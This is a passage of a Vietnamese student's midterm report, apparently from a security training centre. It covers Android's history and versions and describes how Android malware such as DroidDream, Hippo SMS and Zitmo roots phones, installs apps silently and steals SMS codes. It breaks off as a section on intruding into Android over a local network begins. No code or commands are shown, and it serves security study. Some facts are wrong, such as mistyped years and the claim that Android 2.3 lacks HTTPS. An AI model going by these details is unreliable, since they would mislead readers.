Luận văn xây dựng ứng dụng android ôn luyện Trắc Nghiệm Tiếng Anh.doc
Luận văn xây dựng ứng dụng android ôn luyện Trắc Nghiệm Tiếng Anh.docLuận văn xây dựng ứng dụng android ôn luyện Trắc Nghiệm Tiếng Anh.doc
Luận văn xây dựng ứng dụng android ôn luyện Trắc Nghiệm Tiếng Anh.doc
 
đồ áN cơ sở
đồ áN cơ sởđồ áN cơ sở
đồ áN cơ sở
 
đồ áN cơ sở
đồ áN cơ sởđồ áN cơ sở
đồ áN cơ sở
 
Tài liệu học Lập trình Android với Kotlin cơ bản - Trung tâm Tin học Khoa học...
Tài liệu học Lập trình Android với Kotlin cơ bản - Trung tâm Tin học Khoa học...Tài liệu học Lập trình Android với Kotlin cơ bản - Trung tâm Tin học Khoa học...
Tài liệu học Lập trình Android với Kotlin cơ bản - Trung tâm Tin học Khoa học...
 
Giới thiệu FireFox OS
Giới thiệu FireFox OSGiới thiệu FireFox OS
Giới thiệu FireFox OS
 
Luận Văn Xây Dựng Ứng Dụng Android Tương Tác Với Facebook.doc
Luận Văn Xây Dựng Ứng Dụng Android Tương Tác Với Facebook.docLuận Văn Xây Dựng Ứng Dụng Android Tương Tác Với Facebook.doc
Luận Văn Xây Dựng Ứng Dụng Android Tương Tác Với Facebook.doc
 
luan van thac si xay dung ung dung androi tuong tac facebook
luan van thac si xay dung ung dung androi tuong tac facebookluan van thac si xay dung ung dung androi tuong tac facebook
luan van thac si xay dung ung dung androi tuong tac facebook
 
Bao cao hoan chinh
Bao cao hoan chinhBao cao hoan chinh
Bao cao hoan chinh
 
Bao cao cuoi ki version full
Bao cao cuoi ki version fullBao cao cuoi ki version full
Bao cao cuoi ki version full
 
Luận Văn Xây Dựng Ứng Dụng Android Ghi Nhật Ký Chi Tiêu Online.doc
Luận Văn Xây Dựng Ứng Dụng Android Ghi Nhật Ký Chi Tiêu Online.docLuận Văn Xây Dựng Ứng Dụng Android Ghi Nhật Ký Chi Tiêu Online.doc
Luận Văn Xây Dựng Ứng Dụng Android Ghi Nhật Ký Chi Tiêu Online.doc
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kì
 
Báo cáo cuối kỳ
Báo cáo cuối kỳBáo cáo cuối kỳ
Báo cáo cuối kỳ
 
Đề tài: Xây dựng ứng dụng Android nghe nhạc trên internet, HOT
Đề tài: Xây dựng ứng dụng Android nghe nhạc trên internet, HOTĐề tài: Xây dựng ứng dụng Android nghe nhạc trên internet, HOT
Đề tài: Xây dựng ứng dụng Android nghe nhạc trên internet, HOT
 
Tim hieu lap_trinh_android_va_tu_xay_dung_ung_dung_minh_hoa_20120809043144_31
Tim hieu lap_trinh_android_va_tu_xay_dung_ung_dung_minh_hoa_20120809043144_31Tim hieu lap_trinh_android_va_tu_xay_dung_ung_dung_minh_hoa_20120809043144_31
Tim hieu lap_trinh_android_va_tu_xay_dung_ung_dung_minh_hoa_20120809043144_31
 
luan van thac si xay dung ung dung android ghi nhat ky chi tieu onnline
luan van thac si xay dung ung dung android ghi nhat ky chi tieu onnlineluan van thac si xay dung ung dung android ghi nhat ky chi tieu onnline
luan van thac si xay dung ung dung android ghi nhat ky chi tieu onnline
 
Tìm đường trên di động (PhoneGap)
Tìm đường trên di động (PhoneGap)Tìm đường trên di động (PhoneGap)
Tìm đường trên di động (PhoneGap)
 
Cơ sở lý thuyết về hệ thống điều khiển và giám sát các thiết bị trong nhà.docx
Cơ sở lý thuyết về hệ thống điều khiển và giám sát các thiết bị trong nhà.docxCơ sở lý thuyết về hệ thống điều khiển và giám sát các thiết bị trong nhà.docx
Cơ sở lý thuyết về hệ thống điều khiển và giám sát các thiết bị trong nhà.docx
 

Bao cao giua ki

  • 1. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA BÀI BÁO CÁO GIỮA KÌ NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI Trang 1 CBHD: Võ Đỗ Thắng SVTT: Lê Trần Xuân Lãnh
  • 2. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 2 1. Giới thiệu về Android 1.1.Android là gì? Android là một hệ điều hành dựa trên nền tảng Linux được thiết kế dành cho các thiết bị di động có màn hình cảm ứng như điện thoại thông minh và máy tính bảng. Android ra mắt vào năm 2007 cùng với tuyên bố thành lập Liên minh thiết bị cầm tay mở: một hiệp hội gồm các công ty phần cứng, phần mềm, và viễn thông với mục tiêu đẩy mạnh các tiêu chuẩn mở cho các thiết bị di động. Chiếc điện thoại đầu tiên chạy Android được bán vào tháng 10 năm 2008. Android có mã nguồn mở và Google phát hành mã nguồn theo Giấy phép Apache. Chính mã nguồn mở cùng với một giấy phép không có nhiều ràng buộc đã cho phép các nhà phát triển thiết bị, mạng di động và các lập trình viên nhiệt huyết được điều chỉnh và phân phối Android một cách tự do. Ngoài ra, Android còn có một cộng đồng lập trình viên đông đảo chuyên viết các ứng dụng để mở rộng chức năng của thiết bị, bằng một loại ngôn ngữ lập trình Java có sửa đổi. Vào tháng 10 năm 2012, có khoảng 700.000 ứng dụng trên Android, và số lượt tải ứng dụng từ Google Play, cửa hàng ứng dụng chính của Android, ước tính khoảng 25 tỷ lượt. Những yếu tố này đã giúp Android trở thành nền tảng điện thoại thông minh phổ biến nhất thế giới, vượt qua Symbian vào quý 4 năm 2010, và được các công ty công nghệ lựa chọn khi họ cần một hệ điều hành không nặng nề, có khả năng tinh chỉnh, và giá rẻ chạy trên các thiết bị công nghệ cao thay vì tạo dựng từ đầu. Kết quả là mặc dù được thiết kế để chạy trên điện thoại và máy tính bảng, Android đã xuất hiện trên TV, máy chơi game và các thiết bị điện tử khác. Bản chất mở của Android cũng khích lệ một đội ngũ đông đảo lập trình viên và những người đam mê sử dụng mã nguồn mở để tạo ra những dự án do cộng đồng quản lý. Những dự án này bổ sung các tính năng cao cấp cho những người dùng thích tìm tòihoặc đưa Android vào các thiết bị ban đầu chạy hệ điều hành khác. Android chiếm 75% thị phần điện thoại thông minh trên toàn thế giới vào thời điểm quý 3 năm 2012, với tổng cộng 500 triệu thiết bị đã được kích hoạt và 1,3 triệu lượt kích hoạt mỗi ngày. Sự thành công của hệ điều hành cũng khiến nó trở thành mục tiêu trong các vụ kiện liên quan đến bằng phát minh, góp mặt trong cái gọi là "cuộc chiến điện thoại thông minh" giữa các công ty công nghệ. 1.2.Lịch sử phát triển Anroid Tháng 7 năm 2005, Google mua lại Android, Inc., một công ty nhỏ mới thành lập có trụ sở ở Palo Alto, California, Mỹ. Những nhà đồng sáng lập của Android chuyển sang làm việc tại Google gồm có Andy Rubin (đồng sáng lập công ty Danger), Rich Miner (đồng sáng lập công ty Wildfire Communications), Nick Sears (từng là phó chủ tịch của T-Mobile), và Chris White (trưởng nhóm thiết kế và phát triển giao diện tại WebTV). Khi đó, có rất ít thông tin về các công việc của Android, ngoại trừ việc họ đang phát triển phần mềm cho điện thoại di động. Điều này tạo những tin đồn về việc Google có ý định bước vào thị trường điện thoại di động.
  • 3. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Tại Google, nhóm do Rubin đứng đầu đã phát triển một nền tảng thiết bị di động dựa trên hạt nhân Linux, được họ tiếp thị đến các nhà sản xuất thiết bị cầm tay và các nhà mạng trên những tiền đề về việc cung cấp một hệ thống mềm dẻo, có khả năng nâng cấp mở rộng cao.[cần dẫn nguồn] Một số nguồn tin cho biết trước đó Google đã lên danh sách các thành phần phần cứng và các đối tác phần mềm, đồng thời ra hiệu với các nhà mạng rằng họ sẵn sàng hợp tác ở nhiều cấp độ khác nhau. Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di động xuất hiện trong tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú thích rằng Google muốn đưa công nghệ tìm kiếm và các ứng dụng của họ vào điện thoại di động và họ đang nỗ lực làm việc để thực hiện điều này. Các phương tiện truyền thông in và online cũng sớm có bài viết về những tin đồn cho rằng Google đang phát triển một thiết bị cầm tay mang thương hiệu Google. Và lại càng có nhiều suy đoán sau bài viết về việc Google đang định nghĩa các đặc tả công nghệ và trình diễn các mẫu thử với các nhà sản xuất điện thoại di động và nhà mạng. Trang 3 1.3.Đặt điểm của Android 1.3.1. Tính mở Android được xây dựng từ dưới đi lên cho phép người phát triển tạo các ứng dụng di động hấp dẫn với đầy đủ các điểm mạnh của các thiết bị cầm tay hiện có. Android hoàn toàn mở, một ứng dụng có thể gọi tới bất kể một chức năng lõi của điện thoại như tạo cuộc gọi, gửi tin nhắn hay sử dụng máy ảnh, cho phép người phát triển tạo phong phú hơn, liên kết hơn các tính năng cho người dùng. Android được xây dựng trên nhân Linux mở. Thêm nữa, nó sử dụng một máy ảo mà đã được tối ưu hóa bộ nhớ và phần cứng với môi trường di động. Android mà một mã nguồn mở, nó có thể được mở rộng để kết hợp tự do giữa các công nghệ nổi trội. Nền tảng này sẽ tiếp tục phát triển bởi cộng đồng phát triển để tạo ra các ứng dụng di động hoàn hảo. 1.3.2. Tính ngang bằng của các ứng dụng. Với Android, không có sự khác nhau giữa các ứng dụng điện thoại cơ bản với ứng dụng của bên thứ ba. Chúng được xây dựng để truy cập như nhau tới một loạt các ứng dụng và dịch vụ của điện thoại. Với các thiết bị được xây dựng trên nền tảng Android, người dùng có thể đáp ứng đầy đủ các nhu cầu mà họ thích. Chúng ta có thể đổi màn hình nền, kiểu gọi điện thoại, hay bất kể ứng dụng nào. Chúng ta thậm chí có thể hướng dẫn điện thoại chỉ xem những ảnh mình thích. 1.3.3. Phá vỡ rào cản phát triển ứng dụng. Android phá vỡ rào cản để tạo ứng dụng mới và cải tiến. Một người phát triển có thể kết hợp thông tin từ trang web với dữ liệu trên điện thoại cá nhân – chẳng hạn như danh bạ, lịch hay vị trí trên bản đồ – để cung cấp chính xác hơn cho người khác. Với Android, người phát triển có thể xây dựng một ứng dụng mà cho phép người dùng xem vị trí của những người bạn và thông báo khi họ đang ở vị trí lân cận. Tất cả được lập trình dễ dàng thông qua sự hỗ trợ của MapView và dịch vụ định vị toàn cầu GPS. 1.3.4. Xây dựng ứng dụng dễ dàng và nhanh chóng Android cung cấp bộ thư viện giao diện lập trình ứng dụng đồ sộ và các công cụ để viết các ứng dụng phức tạp. Ví dụ, Android có thể cho phép người phát triển biết được vị trí của thiết bị và cho phép các thiết bị giao tiếp với nhau để có thể tạo nên mạng xã hội chia sẻ ngang hàng rộng khắp. Thêm nữa, Android còn bao gồm một bộ công cụ đầy đủ giúp cho việc phát triển trở nên dễ dàng.
  • 4. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 4 1.4.Các phiên bản của android Lịch sử phiên bản của hệ điều hành di động Android bắt đầu với bản Android beta vào tháng 11 năm 2007. Phiên bản thương mại đầu tiên, Android 1.0, được phát hành vào tháng 9 năm 2008. Android đang được phát triển bởi Google và Open Handset Alliance (OHA), và đã có một số bản cập nhật cho hệ điều hành này kể từ khi ra mắt. Từ tháng 4 2009, phiên bản Android được phát triển dưới tên mã là chủ đề bánh kẹo và phát hành theo thứ tự bảng chữ cái: Cupcake (1.5), Donut (1.6), Eclair (2.0–2.1), Froyo (2.2–2.2.3), Gingerbread (2.3–2.3.7), Honeycomb (3.0–3.2.6), Ice Cream Sandwich (4.0–4.0.4), Jelly Bean (4.1–4.3), và KitKat (4.4). Vào 3 tháng 9 năm 2013, Google công bố rằng 1 tỉ thiết bị đã được kích hoạt hiện sử dụng Android OS trên toàn cầu. Bản cập nhật Android gần đây nhất là KitKat 4.4, nó được phát hành bản thương mại trên thiết bị 22 tháng 11 2013, thông qua cập nhật OTA. Bảng thống kê các phiên bản và cập nhật của Android Phiên bản API Tên Ngày phát hành 1.0 Cấp 1 23/9/ 2008 1.1 Cấp 2 9/2/2009 1.5 Cấp 3 Cupcake 30/4/2009 1.6 Cấp 4 Donut 15/9/2009 2.0 Cấp 5 Eclair 26/10/2009 2.0.1 Cấp 6 3/12/2009 2.1 Cấp 7 12/1/2010 2.2 Cấp 8 Froyo 20/5/2010 2.2.1 18/1/2011 2.2.2 22/1/2011 2.2.3 21/11/2011 2.3 Cấp 9 Gingerbread 6/12/2010 2.3.1 12/2010 2.3.2 1/2011 2.3.3 Cấp 10 Gingerbread 9/2/2011 2.3.4 28/4/2011 2.3.5 25/7/2011 2.3.6 2/9/2011 2.3.7 21/9/2011 3.0 Cấp 11 Honeycomb 22/2/2011 3.1 Cấp 12 10/5/2011 3.2 Cấp 13 15/7/2011 3.2.1 20/9/2011 3.2.2 30/8/2011 3.2.3
  • 5. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 3.2.4 12/2011 3.2.5 1/2012 3.2.6 2/1012 4.0 Trang 5 Cấp 14 Ice Cream Sandwich 19/10/2011 4.0.1 21/10/2011 4.0.2 28/11/2011 4.0.3 Cấp 15 16/12/2011 4.0.4 29/3/2012 4.1 Cấp 16 Jelly Bean 9/7/2012 4.1.1 23/7/2012 4.1.2 9/10/2012 4.2 Cấp 17 13/11/2012 4.2.1 27/11/2012 4.2.2 11/2/2013 4.3 Cấp 18 24/7/1013 4.3.1 3/10/2013 4.4 Cấp 19 KitKat 31/10/2013 4.4.1 5/12/2013 4.4.2 9/12/2013 4.4.3 2/6/2014 4.4.4 19/6/2014 1.5.Tỷ lệ sử dụng các phiên bản android Phần lớn các thiết bị Android cho tới nay vẫn chạy hệ điều hành phiên bản 4.1.x Jelly Bean được phát hành ngày 9 tháng 7 năm 2012 nhờ tính ổn định và hỗ trợ tốt các máy có cấu hình thấp cùng với các phiên bản 4.x khác. Bên cạnh đó các thiết bị Android vẫn còn sử dụng các phiên bản cũ hơn là 2.3 Gingerbread phát hành ngày 6 tháng 12 năm 2010. Tỷ lệ sử dụng các phiên bản khác nhau tính đến ngày 20 tháng 7 năm 2014
  • 6. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 1.6.So sánh android 2.3 (Gingerbread) và android 4.x (4.0 – Ice Cream Sandwich): Android 2.3, tên mã là Gingerbread được phát hành vào ngày 6 tháng 12 năm 2010 và là một bản nâng cấp của Android v2.2 Froyo. Các phiên bản 2.3 được thiết kế đặc biệt cho điện thoại thông minh, nó được coi là một trong những phiên bản phổ biến nhất của Android cho điện thoại thông minh. Ngoài bố trí đã có sẵn trên Froyo, công ty cung cấp các thay đổi như giao diện người dùng được cập nhật, tăng tốc độ và sự đơn giản, hỗ trợ cho màn hình lớn hơn và độ phân giải cao, hỗ trợ cho hệ thống điện thoại SIP VOIP, bàn phím ảo nhanh hơn và trực quan hơn, chức năng sao chép dán nâng cao, hỗ trợ NFC, hiệu ứng âm thanh mới, quản lý download mới, hỗ trợ nhiều camera, hỗ trợ xem video WebM/VP8 và AAC mã hóa âm thanh, cải thiện quản lý điện năng, chuyển từ YAFFS đến ext4 trên các thiết bị mới hơn, âm thanh, đồ họa và cải tiến đầu vào cho các nhà phát triển trò chơi, đồng thời thu gom rác thải và hỗ trợ cho các cảm biến nhiều hơn. Công ty cũng vận chuyển một cập nhật nhỏ cho Gingerbread theo phiên bản 2.3.3-2.3.7. Những bản cập nhật được cung cấp tính năng mới như: hỗ trợ cho giọng nói hoặc video chat, mở cửa phụ kiện hỗ trợ thư viện, cải tiến để ứng dụng gmail, hình ảnh động bóng cho danh sách cuộn, cải tiến phần mềm máy ảnh và cải thiện hiệu quả pin. Android 4.0 Ice Cream Sandwich đã được công khai phát hành vào ngày 19 Tháng 10 năm 2011. Các Android 4.0 thật sự là một sự là một bản nâng cấp của 2.3 Gingerbread và được cung cấp một loạt các tính năng mới. Android cũng đã có phiên bản 3.0, chỉ dành cho máy tính bảng. Phiên bản này về cơ bản là một sự kết hợp của Android 2.3.x và Android 3.x. Công ty cung cấp các tính năng cập nhật như: nút mềm, widgets, dễ dàng để tạo thư mục mới, cải thiện thư thoại trực quan, chức năng pinch-to- zoom, chụp ảnh màn hình, bàn phím được cải thiện, khả năng truy cập các ứng dụng từ lockscreen, tính năng mở khóa bằng nhận diện khuôn mặt, trình duyệt web theo thẻ, tự động đồng bộ hóa trình duyệt chrome đánh dấu, kiểu chữ mới cho giao diện người dùng, cải thiện ứng dụng máy ảnh, được xây dựng trong biên tập ảnh, bố trí bộ sưu tập mới, ứng dụng tích hợp với mạng xã hội, cập nhật trạng Trang 6
  • 7. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 thái và hình ảnh hi-res, khả năng tương thích NFC, tăng tốc phần cứng, quản lý wifi và quay video 1080p 1.6.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt Android 2.3 Android 4.0 Cần ít nhất 128 MB bộ nhớ có sẵn cho Kernel và cho không gian người sử dụng Cần ít nhất 340 MB bộ nhớ có sẵn cho kernel và cho không gian người sử dụng Dung lượng Ram tối thiểu cần thiết là 150MB Dung lượng Ram tối thiểu cần thiết là 350 MB Trang 7 Màn hình: - Màn hình phải có kích cỡ ít nhất 2,5 inch - Mật độ phải được ít nhất 100 dpi - Tỉ lệ màn hình từ 1.333 (4:3) đến 1,779 (16:9) - Công nghệ màn hình được sử dụng là công nghệ “ Square pixels” Màn hình: - Màn hình phải có kích cỡ ít nhất 426x320 - Mật độ phải được ít nhất 100 dpi - Tỉ lệ màn hình từ 1.333 (4:3) đến 1,85 (16:9) Yêu cầu có các phím vậy lý Không yêu cầu có có phím vật lý Các API Android bao gồm trình quản lý download các ứng dụng có thể sử dụng để tải dữ liệu.Trình quản lí download phải có khả năng tải tập tin có dung lượng ít nhất 55 MB Các API Android bao gồm trình quản lý download các ứng dụng có thể sử dụng để tải dữ liệu.Trình quản lí download phải có khả năng tải tập tin có dung lượng ít nhất 100 MB 1.6.2. Sự khác nhau về giao diện Giao diện người dùng của Android dựa trên nguyên tắc tác động trực tiếp, sử dụng cảm ứng chạm tương tự như những động tác ngoài đời thực như vuốt, chạm, kéo dãn và thu lại để xử lý các đối tượng trên màn hình. Sự phản ứng với tác động của người dùng diễn ra gần như ngay lập tức, nhằm tạo ra giao diện cảm ứng mượt mà, thường dùng tính năng rung của thiết bị để tạo phản hồi rung cho người dùng. Những thiết bị phần cứng bên trong như gia tốc kế, con quay hồi chuyển và cảm biến khoảng cách được một số ứng dụng sử dụng để phản hồi một số hành động khác của người dùng, ví dụ như điều chỉnh màn hình từ chế độ hiển thị dọc sang chế độ hiển thị ngang tùy theo vị trí của thiết bị, hoặc cho phép người dùng lái xe đua bằng xoay thiết bị, giống như đang điều khiển vô-lăng. Các thiết bị Android sau khi khởi động sẽ hiển thị màn hình chính, điểm khởi đầu với các thông tin chính trên thiết bị, tương tự như khái niệm desktop (bàn làm việc) trên máy tính để bàn. Màn hính chính Android thường gồm nhiều biểu tượng (icon) và tiện ích (widget); biểu tượng ứng
  • 8. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 dụng sẽ mở ứng dụng tương ứng, còn tiện ích hiển thị những nội dung sống động, cập nhật tự động như dự báo thời tiết, hộp thư của người dùng, hoặc những mẩu tin thời sự ngay trên màn hình chính. Màn hình chính có thể gồm nhiều trang xem được bằng cách vuốt ra trước hoặc sau, mặc dù giao diện màn hình chính của Android có thể tùy chỉnh ở mức cao, cho phép người dùng tự do sắp đặt hình dáng cũng như hành vi của thiết bị theo sở thích. Những ứng dụng do các hãng thứ ba có trên Google Play và các kho ứng dụng khác còn cho phép người dùng thay đổi "chủ đề" của màn hình chính, thậm chí bắt chước hình dáng của hệ điều hành khác như Windows Phone chẳng hạn.Phần lớn những nhà sản xuất, và một số nhà mạng, thực hiện thay đổi hình dáng và hành vi của các thiết bị Android của họ để phân biệt với các hãng cạnh tranh. Ở phía trên cùng màn hình là thanh trạng thái, hiển thị thông tin về thiết bị và tình trạng kết nối. Thanh trạng thái này có thể "kéo" xuống để xem màn hình thông báo gồm thông tin quan trọng hoặc cập nhật của các ứng dụng, như email hay tin nhắn SMS mới nhận, mà không làm gián đoạn hoặc khiến người dùng cảm thấy bất tiện. Trong các phiên bản đời đầu, người dùng có thể nhấn vào thông báo để mở ra ứng dụng tương ứng, về sau này các thông tin cập nhật được bổ sung theo tính năng, như có khả năng lập tức gọi ngược lại khi có cuộc gọi nhỡ mà không cần phải mở ứng dụng gọi điện ra. Thông báo sẽ luôn nằm đó cho đến khi người dùng đã đọc hoặc xóa nó đi. Android 2.3 Android 4.0 Giao diện đơn giản Giao diện tinh tế hơn, trong suốt và đẹp mắt hơn Chỉ hỗ trợ phím ảo là phím Home Hỗ trợ các phím ảo: Home, Back, Menu Không có widget menu Có Widget menu giúp tìm nhanh thông tin mà không cần mở ứng dụng Trang 8 1.6.3. Sự khác nhau về tính năng Android 2.3 Android 4.0 Thiết kế tối ưu hóa cho Smartphone Thiết kế tối ưu hóa cho Smartphone và Tablet Chỉ có thể xóa tất các các thông báo cùng lúc trên trình quản lý Chỉ có thể xóa riêng rẽ các thông báo cùng lúc trên trình quản lý Chỉ có thể trả lời, ngắt cuộc gọi khi màn hình bị khóa Có thể thực hiện thêm 1 số tính năng khi màn hình bị khoái ngoài trả lời , ngắt cuộc gọi như
  • 9. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 gửi tin nhắn Không có tính năng mở khóa màn hình nhận diện khuôn mặt Có tính năng mở khóa màn hình nhận diện khuôn mặt Không hỗ trợ chỉnh sửa hình ảnh Hỗ trợ chỉnh sửa hình ảnh , tự động nhận diện được tất cả các camera trên thiết bị Trang 9 1.6.4. Sự khác nhau về giao thức mạng Android 2.3 Android 4.0 Không hỗ trợ giao thức https Hỗ trợ giao thức https 2. Nghiên cứu về mã độc trong mỗi trường android 2.1.Malware là gì? Malware (phần mềm độc hại) viết tắt của cụm từ Malicious Sofware, là một phần mềm máy tính được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc và thay đổi các thực thi của hệ điều hành cũng như các chương trình ứng dụng mà không có sự cho phép của người dùng và bằng một cách nào đó mà người dùng nếu không để ý cũng không thể phát hiện được những thay đổi đó.
  • 10. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Phần mềm độc hại đã xuất hiện từ rất lâu trên những hệ điều hành máy tính như Windows, các máy tính MAC và Linux (ở một mức độ thấp hơn), và bây giờ nó đã trở thành một mối nguy hại không nhỏ cho các thiết bị di động chạy Android. Sự có mặt của Android khiến cho các phần mềm độc hại thêm phần thích thú, tích cực tấn công hơn tới đông đảo người dùng Android. Nói về vấn đề này, Timothy Armstrong, một chuyên gia bảo mật tại Kaspersky Lab, cho biết: “Malware trên Android được phát hiện nhiều hơn hầu như mỗi ngày. Thời gian gần đây, chúng tôi đã phát hiện ra ba nhà phát triển ứng dụng (mà có khi là từ cùng 1 người) với tên gọi MYOURNET, Kingmall2010, we20092020 đã cung cấp các ứng dụng để tải về miễn phí trên Android Market, mà hầu hết các ứng dụng đó đều chứa mã độc”. Năm 2012 là năm thứ hai cho thấy sự bùng nổ của phần mềm độc hại cho Android. Từ tám chương trình độc hại duy nhất vào tháng 1 năm 2011, tỷ lệ phát hiện trung bình hàng tháng phần mềm độc hại mới tấn công vào Android trong năm 2011 đã lên đến hơn 800 mẫu. Trong năm 2012, Kaspersky Lab đã xác định trung bình 6.300 mẫu phần mềm độc hại trên thiết bị di động mới mỗi tháng. Nhìn chung, trong năm 2012 số lượng mẫu độc hại cho Android được biết đến nhiều tăng hơn tám lần. Trang 10 2.2.Phân loại Đa số các phần mềm độc hại Android có thể được chia thành ba nhóm chính dựa theo chức năng: - SMS Trojans: bòn rút tài khoản di động của các nạn nhân bằng cách gửi tin nhắn SMS đến các số điện thoại được đánh giá cao. - Backdoors: cung cấp truy cập trái phép vào smartphone, cài đặt các chương trình độc hại khác hoặc ăn cắp dữ liệu cá nhân của người dùng. - Cuối cùng là các phần mềm gián điệp nhằm mục tiêu thu thập trái phép dữ liệu cá nhân, chẳng hạn như sổ địa chỉ và mật khẩu (hoặc thậm chí hình ảnh cá nhân).
  • 11. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trong nửa đầu năm 2012, Backdoors, tin nhắn SMS, Trojans và phần mềm gián điệp chiếm 51% các phần mềm độc hại cho Android mới được phát hiện. Trong bảng xếp hạng Top Ten phần mềm độc hại cho Android đã bị chặn bởi Kaspersky Mobile Security hoặc Kaspersky Tablet Security, SMS Trojans là phổ biến nhất và các ứng dụng hiển thị quảng cáo không mong muốn cho người sử dụng ở vị trí thứ hai. Ít phổ biến rộng rãi nhưng nguy hiểm nhất là Trojans ngân hàng trên di động thường xuyên làm việc kết hợp với các máy tính để bàn, ví dụ như Carberp. Nền tảng Android cho phép cài đặt phần mềm từ các nguồn không tin cậy, và là một trong những cách tốt nhất để đảm bảo sự lây nhiễm từ việc cài đặt các chương trình từ những trang web đáng ngờ. Tuy nhiên, phần mềm độc hại trên nền tảng phân phối ứng dụng chính thức Google Play là một xu hướng bắt đầu vào năm 2011 và tiếp tục trong năm 2012, bất chấp những nỗ lực tốt nhất của Google để làm giảm hoạt động tội phạm mạng. Một trong những ví dụ “khác thường” nhất của phần mềm độc hại trên di động trong năm 2012 là "Find and Call", ứng dụng đã len lỏi được vào Google Play cũng như kho ứng dụng của Apple. Trang 11 2.3.Cơ chế hoạt động của Malware Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là Malware DroidDream. Malware này hoạt động qua 2 giai đoạn: Giai đoạn đầu: DroidDream được nhúng vào trong một ứng dụng (số lượng ứng dụng chứa Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền root vào thiết bị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên. Giai đoạn 2: Tự động cài đặt một ứng dụng thứ 2 với một giấy phép đặc biệt cho phép quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác. Một khi DroidDream chiếm được quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt một ứng dụng thứ hai, DownloadProviderManager.apk như một ứng dụng hệ thống. Việc cài đặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép. Nghiên cứu cài đặt HĐH Android trên các thiết bị laptop, smartphone.Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt đầu việc lây nhiễm, ở giai đoạn thứ 2 ứng dụng tự động làm một số việc như là confirm, checkin….Một điều nữa khiến cho bạn không thể biết chúng hoạt động lúc nào, đó là Malware DroidDream này được lập trình để làm hầu hết các công việc của mình vào khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau. Đây là khoảng thời gian mà điện thoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn hơn trong việc phát hiện một hành vi bất thường trên chiếc smartphone của mình. 2.4.Mục đích của Malware DroidDream DroidDream được coi là một trong những Malware đầu tiên trên Android, mục đích của con DroidDream này mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người dùng tự động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể của nó đã kịp thời biến đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS có khả năng tự gửi tin nhắn mà không cần sự cho phép của người dùng, việc này sẽ khiến tiền cước phí của người dùng tăng lên một cách chóng mặt mà người dùng không biết rõ lí do tại sao. Hoặc một Malware khác là Zitmo, Malware này đưa ra các ứng dụng kích hoạt mọi hành động liên quan đến dịch vụ ngân hàng, tiếp nhận SMS gửi đến và chuyển tới máy chủ. Các đoạn code dùng 1 lần mà các ngân hàng
  • 12. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 thường gửi tới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các malware này. Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một theo dõi, vì vậy những mối nguy hiểm từ mã độc trên android đang thực sự đe dọa đến an sự an toàn của người dùng hệ điều hành này. 2.5.Dấu hiệu bị nhiễm các phần mềm độc hại Cũng giống như trên máy tính, khi bị nhiễm malware, thiết bị Android của bạn sẽ có một số hành động khác thường và bạn không thể thay đổi được bất kỳ điều gì. - Sử dụng dữ liệu không rõ ràng: có rất nhiều phần mềm độc hại tồn tại để thu thập dữ liệu về tài khoản, số thẻ tín dụng, danh bạ, vv... Một khi có được các thông tin này, nó sẽ tự động được chuyển tiếp về cho người đã tạo ra nó. Và trong nhiều trường hợp, việc chuyển giao thông tin này sẽ dẫn đến sự khác lạ trong sử dụng dữ liệu. - Hiệu suất của thiết bị kém: tùy thuộc vào thời gian sử dụng và mức độ nghiêm trọng của việc lây nhiễm mà hiệu suất điện thoại của bạn sẽ bị giảm đi nhiều hay ít, đặc biệt là khi bạn đã khởi động lại thiết bị mà các vấn đề không được giảm bớt. - Thời lượng pin bị giảm: do hầu hết các phần mềm độc hại đều được thiết kế để chạy nền trong hệ thống, nên nó sẽ làm sụt giảm đáng kể thời lượng pin trên thiết bị của bạn. 3. Xâm nhập android qua mạng local 3.1.Giới thiệu về Kali Linux Trong những năm qua BackTrack là hệ điều hành được sử dụng nhiều nhất bởi các chuyên gia đánh giá bảo mật. BackTrack bắt 